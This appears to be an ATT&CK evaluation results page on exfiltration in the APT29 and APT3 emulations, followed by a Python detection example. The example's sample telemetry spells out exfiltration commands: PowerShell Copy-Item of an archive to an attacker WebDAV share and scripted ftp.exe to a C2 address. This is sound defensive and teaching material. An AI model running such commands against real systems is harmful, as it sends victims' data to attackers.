Carbanak+FIN7

The technique was not in scope.
APT29

| Step | ATT&CK Pattern | Detection Type | Detection Note |
|---|---|---|---|
| 7.B.4 | Exfiltrated collection (OfficeSupplies.7z) to WebDAV network share using PowerShell: powershell executing Copy-Item pointing to an attack-controlled WebDav network share (192.168.0.4:80) [1] | | Telemetry showed PowerShell creating OfficeSupplies.7z on a remote adversary WebDav network share (192.168.0.4). The detection was correlated to a parent alert for the rcs.3aka3.doc screensaver process executing from the users or temporary folder. [1] |
| 7.B.4 | Exfiltrated collection (OfficeSupplies.7z) to WebDAV network share using PowerShell: powershell executing Copy-Item pointing to an attack-controlled WebDav network share (192.168.0.4:80) [1] | | An MSSP detection occurred containing evidence of OfficeSupplies.7z being copied over the network via WebDav to 192.168.0.4. [1] |
| 7.B.4 | Exfiltrated collection (OfficeSupplies.7z) to WebDAV network share using PowerShell: powershell executing Copy-Item pointing to an attack-controlled WebDav network share (192.168.0.4:80) [1] | General (Correlated, Alert) | A General alert detection (red indicator) called "File being written to remote path" was generated for the file OfficeSupplies.7z being written to a WebDav share at 192.168.0.4. The detection was correlated to a parent alert for the rcs.3aka3.doc screensaver process executing from the users or temporary folder. [1] |
APT3

| Step | ATT&CK Pattern | Detection Type | Detection Note |
|---|---|---|---|
| 19.C.1 | Empire: Sequence of 'echo' commands via PowerShell to populate commands in a text file (ftp.txt), which is then executed by FTP to exfil data through a network connection separate from the existing C2 channel | | The capability enriched ftp.exe as the execution of a CLI file transfer/copy utility. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. |
| 19.C.1 | Empire: Sequence of 'echo' commands via PowerShell to populate commands in a text file (ftp.txt), which is then executed by FTP to exfil data through a network connection separate from the existing C2 channel | | Telemetry showed the execution of ftp.exe and its command-line arguments as well as an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. |
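The two steps above describe the same detection shape from the defender's side: a process event (PowerShell running Copy-Item to a UNC/WebDAV destination, or ftp.exe driven by a command file) joined to a network event for the same process, then tied back to an earlier "parent" alert on the process tree. The following is an added illustration written for this page, not the evaluated vendor's rules or the evaluation's telemetry. Every event record, pid, allow-list entry and parent alert in it is constructed sample data; only the destination address 192.168.0.4, the archive name and the ftp.txt script file are taken from the notes above.

```python
"""Toy detection rules for the two exfiltration steps in the evaluation notes.

All events, pids, the share allow-list and the parent alerts below are constructed
sample data for illustration; none of it is vendor code or evaluation telemetry.
"""
import re

# Constructed process telemetry: one event per process start.
PROCESS_EVENTS = [
    {"pid": 4021, "ppid": 3900, "image": "powershell.exe",
     "cmdline": r"powershell.exe -c Copy-Item C:\Users\Pam\AppData\Local\Temp\OfficeSupplies.7z "
                r"\\192.168.0.4\webdav\OfficeSupplies.7z"},
    {"pid": 5112, "ppid": 5000, "image": "ftp.exe",
     "cmdline": r"ftp.exe -s:C:\Windows\Temp\ftp.txt 192.168.0.4"},
    # Benign copy to a recognised corporate share; must not alert.
    {"pid": 6001, "ppid": 1200, "image": "powershell.exe",
     "cmdline": r"powershell.exe -c Copy-Item C:\reports\q1.xlsx \\fileserver.corp.example\share\q1.xlsx"},
]

# Constructed network telemetry keyed to the process that opened the connection.
NETWORK_EVENTS = [
    {"pid": 4021, "dst_ip": "192.168.0.4", "dst_port": 80},   # WebDAV over HTTP
    {"pid": 5112, "dst_ip": "192.168.0.4", "dst_port": 21},   # FTP control channel
    {"pid": 6001, "dst_ip": "10.10.5.20", "dst_port": 445},   # SMB to the file server
]

# Constructed allow-list of hosts the organisation knows as legitimate file shares.
KNOWN_SHARE_HOSTS = {"fileserver.corp.example", "10.10.5.20"}

# Constructed earlier alerts keyed by pid; these stand in for the "parent alert"
# the evaluation notes correlate each detection to.
PARENT_ALERTS = {
    3900: "rcs.3aka3.doc screensaver executing from user temp folder",
    5000: "suspicious execution of the Windows Scripting Engine",
}

# Captures the host portion of a UNC path such as \\host\share\file.
UNC_HOST = re.compile(r"\\\\([^\\\s]+)\\")


def remote_copy_hosts(cmdline):
    """Return the UNC hosts a Copy-Item command line references, or [] if none."""
    if "copy-item" not in cmdline.lower():
        return []
    return UNC_HOST.findall(cmdline)


def ftp_script_file(cmdline):
    """Return the path given to ftp.exe's -s: (run commands from file) switch, else None."""
    match = re.search(r"-s:(\S+)", cmdline, re.IGNORECASE)
    return match.group(1) if match else None


def network_by_pid(net_events):
    """Index network events by originating pid so process hits can be enriched."""
    index = {}
    for ev in net_events:
        index.setdefault(ev["pid"], []).append(ev)
    return index


def detect(process_events, network_events,
           known_hosts=KNOWN_SHARE_HOSTS, parents=PARENT_ALERTS):
    """Apply both rules and attach network context and any parent alert to each hit."""
    net = network_by_pid(network_events)
    alerts = []
    for ev in process_events:
        image, cmd = ev["image"].lower(), ev["cmdline"]
        hit = None
        if image == "powershell.exe":
            # Rule 1: file written to a remote path on a host that is not a known share.
            unknown = [h for h in remote_copy_hosts(cmd) if h not in known_hosts]
            if unknown:
                hit = {"rule": "file_written_to_remote_path", "hosts": unknown}
        elif image == "ftp.exe":
            # Rule 2: scripted ftp.exe that actually opened an FTP control connection.
            script = ftp_script_file(cmd)
            ftp_conns = [n for n in net.get(ev["pid"], []) if n["dst_port"] == 21]
            if script and ftp_conns:
                hit = {"rule": "scripted_ftp_transfer", "script": script,
                       "hosts": [n["dst_ip"] for n in ftp_conns]}
        if hit is None:
            continue
        hit["pid"] = ev["pid"]
        hit["network"] = net.get(ev["pid"], [])
        # "Tainting": inherit the alert raised earlier on the parent process, if any.
        hit["correlated_to"] = parents.get(ev["ppid"])
        alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in detect(PROCESS_EVENTS, NETWORK_EVENTS):
        print(alert["rule"], alert["hosts"], "<- parent:", alert["correlated_to"])
```

The allow-list is what keeps the remote-path rule from firing on every PowerShell copy to a departmental share; in practice it would be fed from asset inventory rather than a literal set, and the parent-alert lookup would walk more than one level of the process tree.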